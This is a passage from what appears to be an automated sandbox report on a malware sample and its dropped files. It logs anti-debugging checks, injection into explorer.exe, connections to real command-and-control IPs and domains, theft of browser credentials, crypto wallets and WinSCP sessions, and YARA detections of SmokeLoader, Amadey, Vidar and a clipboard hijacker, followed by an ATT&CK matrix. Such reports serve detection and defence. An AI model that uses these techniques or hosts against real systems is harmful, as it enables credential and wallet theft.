AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
Source: aafg31.exe, 00000015.00000003.483479878.000001E2901C5000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.509760935.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.473601019.000001E2901B4000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.488493072.000001E2901C4000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2901A6000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.489120005.000001E2901C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 80ehgFS
Source: explorer.exe, 00000001.00000000.369535854.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\01860199.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\01860199.exe

System information queried: ModuleInformation

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\01860199.exe	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\hwgujdv	System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_023F092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_023F0D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_024A50A3 push dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\01860199.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\hwgujdv	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: 5_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: 5_2_024A671C rdtsc

Source: C:\Users\user\AppData\Local\Temp\3C54.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_004084CF SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_0040D9F8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_0040533B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_004063C4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: toobussy.com
Source: C:\Windows\explorer.exe	Network Connect: 123.140.161.243 80
Source: C:\Windows\explorer.exe	Network Connect: 80.66.203.53 443
Source: C:\Windows\explorer.exe	Domain query: colisumy.com
Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Domain query: speedlab.com.eg
Source: C:\Windows\explorer.exe	Network Connect: 45.9.74.80 80
Source: C:\Windows\explorer.exe	Network Connect: 217.174.148.28 443
Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.7 80
Source: C:\Windows\explorer.exe	Network Connect: 211.40.39.251 80
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.7 80
Source: C:\Windows\explorer.exe	Network Connect: 211.119.84.112 80
Source: C:\Windows\explorer.exe	Network Connect: 183.100.39.157 80
Source: C:\Windows\explorer.exe	Domain query: shsplatform.co.uk
Source: C:\Windows\explorer.exe	Network Connect: 222.236.49.123 80
Source: C:\Windows\explorer.exe	Network Connect: 194.180.48.90 80
Source: C:\Windows\explorer.exe	Network Connect: 222.236.49.124 80

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 3C54.exe.1.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\01860199.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\01860199.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\hwgujdv	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\hwgujdv	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Memory written: C:\Users\user\AppData\Local\Temp\D804.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Memory written: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Memory written: C:\Users\user\AppData\Local\Temp\D804.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Memory written: C:\Users\user\AppData\Local\Temp\B46F.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Memory written: C:\Users\user\AppData\Local\Temp\A170.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Memory written: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Memory written: C:\Users\user\AppData\Local\Temp\913F.exe base: 400000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\01860199.exe	Thread created: C:\Windows\explorer.exe EIP: 5801B14
Source: C:\Users\user\AppData\Roaming\hwgujdv	Thread created: unknown EIP: 58A1B14
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Thread created: unknown EIP: 59319C0

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe C:\Users\user\AppData\Local\Temp\D804.exe
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\Temp\D804.exe "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\NewPlayer.exe "C:\Users\user\AppData\Local\Temp\NewPlayer.exe"
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe	Process created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe "C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Process created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process created: C:\Users\user\AppData\Local\Temp\B46F.exe C:\Users\user\AppData\Local\Temp\B46F.exe
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Process created: C:\Users\user\AppData\Local\Temp\A170.exe C:\Users\user\AppData\Local\Temp\A170.exe
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Process created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Process created: C:\Users\user\AppData\Local\Temp\913F.exe C:\Users\user\AppData\Local\Temp\913F.exe
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Process created: unknown unknown

Source: explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000001.00000000.366384416.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.362608605.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000001.00000000.362869781.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: GetLocaleInfoA,

Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3C54.exe VolumeInformation
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5DA0.exe VolumeInformation

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: 5_2_0040963C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 20.2.3C54.exe.408ef90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.NewPlayer.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.mnolyk.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.NewPlayer.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.mnolyk.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.3C54.exe.408ef90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.460937652.0000000000061000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.476037262.0000000000061000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.618608332.0000000000E01000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.475540855.0000000000E01000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.507574434.0000000004050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Amadey bot

Source: Yara match	File source: 00000023.00000003.612344653.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.618034875.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.520904242.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.520904242.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.618034875.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.618034875.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Clipboard Hijacker

Source: Yara match	File source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPED

Yara detected Fabookie

Source: Yara match

File source: Process Memory Space: aafg31.exe PID: 2336, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 32.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.build2.exe.8415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.build2.exe.8415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.519993720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 4696, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match	File source: 00000020.00000002.522623167.0000000002345000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Fabookie

Source: Yara match

File source: Process Memory Space: aafg31.exe PID: 2336, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 32.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.build2.exe.8415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.build2.exe.8415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.519993720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 4696, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	412 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	2 Data Encrypted for Impact
Default Accounts	1 Native API	11 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Deobfuscate/Decode Files or Information	1 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	1 Services File Permissions Weakness	11 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	1 Credentials in Registry	45 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Command and Scripting Interpreter	Logon Script (Mac)	1 Services File Permissions Weakness	22 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	441 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	126 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	412 Process Injection	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
